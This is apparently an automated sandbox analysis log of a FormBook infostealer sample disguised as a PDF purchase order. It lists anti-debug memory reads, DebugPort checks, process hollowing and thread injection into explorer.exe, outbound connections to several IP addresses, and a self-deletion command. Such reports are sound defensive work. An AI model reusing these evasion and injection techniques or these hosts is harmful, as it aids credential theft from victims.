Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AB316E mov eax, dword ptr fs:[00000030h]	2_2_00AB316E
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AB316E mov eax, dword ptr fs:[00000030h]	2_2_00AB316E
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AB316E mov eax, dword ptr fs:[00000030h]	2_2_00AB316E
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AB316E mov eax, dword ptr fs:[00000030h]	2_2_00AB316E
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AB316E mov eax, dword ptr fs:[00000030h]	2_2_00AB316E
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AB316E mov eax, dword ptr fs:[00000030h]	2_2_00AB316E
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A61160 mov eax, dword ptr fs:[00000030h]	2_2_00A61160
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A61160 mov eax, dword ptr fs:[00000030h]	2_2_00A61160
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A9E179 mov eax, dword ptr fs:[00000030h]	2_2_00A9E179
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A5E176 mov eax, dword ptr fs:[00000030h]	2_2_00A5E176
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A5E176 mov eax, dword ptr fs:[00000030h]	2_2_00A5E176
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A35170 mov eax, dword ptr fs:[00000030h]	2_2_00A35170
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A35170 mov eax, dword ptr fs:[00000030h]	2_2_00A35170
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A35170 mov eax, dword ptr fs:[00000030h]	2_2_00A35170
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A35170 mov eax, dword ptr fs:[00000030h]	2_2_00A35170
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A24140 mov eax, dword ptr fs:[00000030h]	2_2_00A24140
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A24140 mov eax, dword ptr fs:[00000030h]	2_2_00A24140
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A24140 mov eax, dword ptr fs:[00000030h]	2_2_00A24140
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00ADF15A mov eax, dword ptr fs:[00000030h]	2_2_00ADF15A
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A172A0 mov eax, dword ptr fs:[00000030h]	2_2_00A172A0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A2A2A0 mov eax, dword ptr fs:[00000030h]	2_2_00A2A2A0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A2A2A0 mov eax, dword ptr fs:[00000030h]	2_2_00A2A2A0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A2A2A0 mov eax, dword ptr fs:[00000030h]	2_2_00A2A2A0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A2A2A0 mov eax, dword ptr fs:[00000030h]	2_2_00A2A2A0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A2A2A0 mov eax, dword ptr fs:[00000030h]	2_2_00A2A2A0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A2A2A0 mov eax, dword ptr fs:[00000030h]	2_2_00A2A2A0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A282A0 mov eax, dword ptr fs:[00000030h]	2_2_00A282A0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A282A0 mov eax, dword ptr fs:[00000030h]	2_2_00A282A0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A282A0 mov eax, dword ptr fs:[00000030h]	2_2_00A282A0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A282A0 mov eax, dword ptr fs:[00000030h]	2_2_00A282A0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1D2AC mov eax, dword ptr fs:[00000030h]	2_2_00A1D2AC
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1D2AC mov eax, dword ptr fs:[00000030h]	2_2_00A1D2AC
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AEA2B4 mov eax, dword ptr fs:[00000030h]	2_2_00AEA2B4
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A302B9 mov eax, dword ptr fs:[00000030h]	2_2_00A302B9
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A302B9 mov eax, dword ptr fs:[00000030h]	2_2_00A302B9
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A302B9 mov eax, dword ptr fs:[00000030h]	2_2_00A302B9
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A302B9 mov eax, dword ptr fs:[00000030h]	2_2_00A302B9
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A302B9 mov eax, dword ptr fs:[00000030h]	2_2_00A302B9
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A302B9 mov eax, dword ptr fs:[00000030h]	2_2_00A302B9
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A302B9 mov eax, dword ptr fs:[00000030h]	2_2_00A302B9
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A302B9 mov eax, dword ptr fs:[00000030h]	2_2_00A302B9
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A43295 mov eax, dword ptr fs:[00000030h]	2_2_00A43295
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A9C290 mov eax, dword ptr fs:[00000030h]	2_2_00A9C290
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A3E2E0 mov eax, dword ptr fs:[00000030h]	2_2_00A3E2E0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A3E2E0 mov eax, dword ptr fs:[00000030h]	2_2_00A3E2E0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A3E2E0 mov eax, dword ptr fs:[00000030h]	2_2_00A3E2E0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1E2E8 mov eax, dword ptr fs:[00000030h]	2_2_00A1E2E8
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1E2E8 mov eax, dword ptr fs:[00000030h]	2_2_00A1E2E8
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1E2E8 mov eax, dword ptr fs:[00000030h]	2_2_00A1E2E8
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A432FD mov eax, dword ptr fs:[00000030h]	2_2_00A432FD
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A192C3 mov eax, dword ptr fs:[00000030h]	2_2_00A192C3
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A192C3 mov eax, dword ptr fs:[00000030h]	2_2_00A192C3
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00ADF2C8 mov eax, dword ptr fs:[00000030h]	2_2_00ADF2C8
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AA42C5 mov eax, dword ptr fs:[00000030h]	2_2_00AA42C5
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1B233 mov eax, dword ptr fs:[00000030h]	2_2_00A1B233
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1B233 mov eax, dword ptr fs:[00000030h]	2_2_00A1B233
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1B233 mov eax, dword ptr fs:[00000030h]	2_2_00A1B233
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A40200 mov ecx, dword ptr fs:[00000030h]	2_2_00A40200
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4F21A mov eax, dword ptr fs:[00000030h]	2_2_00A4F21A
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A9E262 mov eax, dword ptr fs:[00000030h]	2_2_00A9E262
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A9E262 mov eax, dword ptr fs:[00000030h]	2_2_00A9E262
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A9E262 mov eax, dword ptr fs:[00000030h]	2_2_00A9E262
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A9E262 mov eax, dword ptr fs:[00000030h]	2_2_00A9E262
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AA0261 mov eax, dword ptr fs:[00000030h]	2_2_00AA0261
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AA0261 mov eax, dword ptr fs:[00000030h]	2_2_00AA0261
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1926F mov eax, dword ptr fs:[00000030h]	2_2_00A1926F
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1C270 mov ecx, dword ptr fs:[00000030h]	2_2_00A1C270
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4427F mov eax, dword ptr fs:[00000030h]	2_2_00A4427F
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4427F mov eax, dword ptr fs:[00000030h]	2_2_00A4427F
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A27250 mov eax, dword ptr fs:[00000030h]	2_2_00A27250
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A27250 mov eax, dword ptr fs:[00000030h]	2_2_00A27250
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A27250 mov eax, dword ptr fs:[00000030h]	2_2_00A27250
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AFB3AF mov eax, dword ptr fs:[00000030h]	2_2_00AFB3AF
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AFB3AF mov eax, dword ptr fs:[00000030h]	2_2_00AFB3AF
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A533A0 mov eax, dword ptr fs:[00000030h]	2_2_00A533A0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AEA3A3 mov eax, dword ptr fs:[00000030h]	2_2_00AEA3A3
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1E380 mov eax, dword ptr fs:[00000030h]	2_2_00A1E380
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1E380 mov eax, dword ptr fs:[00000030h]	2_2_00A1E380
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1E380 mov eax, dword ptr fs:[00000030h]	2_2_00A1E380
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1C387 mov eax, dword ptr fs:[00000030h]	2_2_00A1C387
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A2638B mov eax, dword ptr fs:[00000030h]	2_2_00A2638B
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AAC380 mov eax, dword ptr fs:[00000030h]	2_2_00AAC380
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AAD390 mov ecx, dword ptr fs:[00000030h]	2_2_00AAD390
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AAD390 mov eax, dword ptr fs:[00000030h]	2_2_00AAD390
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AAD390 mov eax, dword ptr fs:[00000030h]	2_2_00AAD390
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1B3E0 mov eax, dword ptr fs:[00000030h]	2_2_00A1B3E0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A573F5 mov eax, dword ptr fs:[00000030h]	2_2_00A573F5
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A573F5 mov ecx, dword ptr fs:[00000030h]	2_2_00A573F5
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A163CD mov eax, dword ptr fs:[00000030h]	2_2_00A163CD
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00ADF3D2 mov eax, dword ptr fs:[00000030h]	2_2_00ADF3D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A2B320 mov eax, dword ptr fs:[00000030h]	2_2_00A2B320
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A2B320 mov eax, dword ptr fs:[00000030h]	2_2_00A2B320
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A2B320 mov eax, dword ptr fs:[00000030h]	2_2_00A2B320
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A2B320 mov eax, dword ptr fs:[00000030h]	2_2_00A2B320
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A2B320 mov eax, dword ptr fs:[00000030h]	2_2_00A2B320
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A2B320 mov eax, dword ptr fs:[00000030h]	2_2_00A2B320
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A5E335 mov eax, dword ptr fs:[00000030h]	2_2_00A5E335
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A5E335 mov eax, dword ptr fs:[00000030h]	2_2_00A5E335
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A5E335 mov eax, dword ptr fs:[00000030h]	2_2_00A5E335
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A5E335 mov eax, dword ptr fs:[00000030h]	2_2_00A5E335
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A5E335 mov eax, dword ptr fs:[00000030h]	2_2_00A5E335
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A5E335 mov eax, dword ptr fs:[00000030h]	2_2_00A5E335
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A5E335 mov eax, dword ptr fs:[00000030h]	2_2_00A5E335
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A5E335 mov eax, dword ptr fs:[00000030h]	2_2_00A5E335
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A18307 mov eax, dword ptr fs:[00000030h]	2_2_00A18307
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A18307 mov eax, dword ptr fs:[00000030h]	2_2_00A18307
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A18307 mov eax, dword ptr fs:[00000030h]	2_2_00A18307
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AAF31F mov eax, dword ptr fs:[00000030h]	2_2_00AAF31F
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AAF31F mov eax, dword ptr fs:[00000030h]	2_2_00AAF31F
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AAF31F mov eax, dword ptr fs:[00000030h]	2_2_00AAF31F
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AAF31F mov eax, dword ptr fs:[00000030h]	2_2_00AAF31F
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AAF31F mov eax, dword ptr fs:[00000030h]	2_2_00AAF31F
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4A360 mov eax, dword ptr fs:[00000030h]	2_2_00A4A360
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4A360 mov eax, dword ptr fs:[00000030h]	2_2_00A4A360
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4A360 mov eax, dword ptr fs:[00000030h]	2_2_00A4A360
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A29366 mov eax, dword ptr fs:[00000030h]	2_2_00A29366
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A29366 mov eax, dword ptr fs:[00000030h]	2_2_00A29366
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]	2_2_00ACF37B
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]	2_2_00ACF37B
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]	2_2_00ACF37B
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]	2_2_00ACF37B
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]	2_2_00ACF37B
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]	2_2_00ACF37B
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00ACF37B mov ecx, dword ptr fs:[00000030h]	2_2_00ACF37B
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00ACF37B mov ecx, dword ptr fs:[00000030h]	2_2_00ACF37B
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]	2_2_00ACF37B
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]	2_2_00ACF37B
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]	2_2_00ACF37B
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]	2_2_00ACF37B
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]	2_2_00ACF37B
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00ADF34D mov eax, dword ptr fs:[00000030h]	2_2_00ADF34D
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A21340 mov eax, dword ptr fs:[00000030h]	2_2_00A21340
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A21340 mov eax, dword ptr fs:[00000030h]	2_2_00A21340
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A21340 mov eax, dword ptr fs:[00000030h]	2_2_00A21340
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A21340 mov eax, dword ptr fs:[00000030h]	2_2_00A21340
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A21340 mov eax, dword ptr fs:[00000030h]	2_2_00A21340
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4234A mov eax, dword ptr fs:[00000030h]	2_2_00A4234A
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A3F350 mov eax, dword ptr fs:[00000030h]	2_2_00A3F350
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A3F350 mov eax, dword ptr fs:[00000030h]	2_2_00A3F350
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A3F350 mov eax, dword ptr fs:[00000030h]	2_2_00A3F350
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A3F350 mov eax, dword ptr fs:[00000030h]	2_2_00A3F350
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A3F350 mov eax, dword ptr fs:[00000030h]	2_2_00A3F350
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A3F350 mov eax, dword ptr fs:[00000030h]	2_2_00A3F350
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4F4A0 mov eax, dword ptr fs:[00000030h]	2_2_00A4F4A0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4F4A0 mov eax, dword ptr fs:[00000030h]	2_2_00A4F4A0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4F4A0 mov eax, dword ptr fs:[00000030h]	2_2_00A4F4A0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4F4A0 mov eax, dword ptr fs:[00000030h]	2_2_00A4F4A0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4F4A0 mov eax, dword ptr fs:[00000030h]	2_2_00A4F4A0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4F4A0 mov eax, dword ptr fs:[00000030h]	2_2_00A4F4A0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4F4A0 mov eax, dword ptr fs:[00000030h]	2_2_00A4F4A0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4F4A0 mov eax, dword ptr fs:[00000030h]	2_2_00A4F4A0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4F4A0 mov eax, dword ptr fs:[00000030h]	2_2_00A4F4A0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A444A1 mov eax, dword ptr fs:[00000030h]	2_2_00A444A1
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A444A1 mov eax, dword ptr fs:[00000030h]	2_2_00A444A1

Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Code function: 2_2_0040ACE0 LdrLoadDll,

2_2_0040ACE0

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Code function: 0_2_1000270A SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_1000270A

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 1.1.1.1 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 188.114.97.7 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.233.138.132 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.96.162.129 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 217.70.184.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.149.87.45 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.148.25.122 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Section unmapped: C:\Windows\SysWOW64\control.exe base address: D10000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Section loaded: unknown target: C:\Users\user\Desktop\PO-230821_pdf.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Thread register set: target process: 4376			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Thread register set: target process: 4376			Jump to behavior

Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Process created: C:\Users\user\Desktop\PO-230821_pdf.exe C:\Users\user\Desktop\PO-230821_pdf.exe			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\PO-230821_pdf.exe"			Jump to behavior

Source: explorer.exe, 00000003.00000000.1094883059.0000000001721000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3578384674.0000000001721000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000000.1094883059.0000000001721000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3602781912.00000000072A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3578384674.0000000001721000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.1094883059.0000000001721000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3578384674.0000000001721000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3554856830.0000000001182000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.3605338155.0000000008798000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1122088983.0000000008798000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndrXl
Source: explorer.exe, 00000003.00000000.1094883059.0000000001721000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3578384674.0000000001721000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Code function: 0_2_10005C7B cpuid

0_2_10005C7B

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Code function: 0_2_10002549 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,

0_2_10002549

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

0_2_00403640

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 0.2.PO-230821_pdf.exe.2470000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PO-230821_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PO-230821_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-230821_pdf.exe.2470000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected NSISDropper

Source: Yara match

File source: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 0.2.PO-230821_pdf.exe.2470000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PO-230821_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PO-230821_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-230821_pdf.exe.2470000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
